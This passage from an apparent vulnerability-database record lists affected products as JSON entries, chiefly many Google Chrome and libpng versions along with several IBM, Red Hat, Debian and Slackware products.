"vendor": "google",
"version": "18.0.1025.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.99"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.184"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.154"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "48.0.2564.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.32"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.11"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.672.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.608.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.135"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.675.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.117"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.755.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1072.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.215"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.63"
},
{
"_id": null,
"model": "tivoli network manager if0002 ip editio",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.617.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1019.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.685.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.312"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.110"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.699.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.961.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.68"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.202"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.341"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1662.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1669.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.132"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.168"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1286.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.703.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.668.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.744.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.74"
},
{
"_id": null,
"model": "cognos insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1078.0"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.144"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1283.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.711.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.330"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.21"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.61"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.686.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.147"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.797.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.14443"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.774.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.803.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.623.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1001.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.686.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.859.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1674.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.930.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.562.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.798.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.227"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1077.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.111"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.647.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.937.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.90"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.26"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.25"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.136"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.867.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.120"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.329"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.746.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1287.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.50"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.303"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.753.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1038.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.728.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.7"
},
{
"_id": null,
"model": "cognos tm1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.706.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.824.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.28"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.3"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.585.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.557.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.15"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.85"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.20"
},
{
"_id": null,
"model": "cognos tm1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.111"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1053.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.957.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.573.0"
},
{
"_id": null,
"model": "security network protection",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.806.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.863.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.652.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.28"
},
{
"_id": null,
"model": "cognos metrics manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.719.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.952.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.872.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.57"
},
{
"_id": null,
"model": "linux x86 64 -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1022.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.36"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "46.0.2490.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.153"
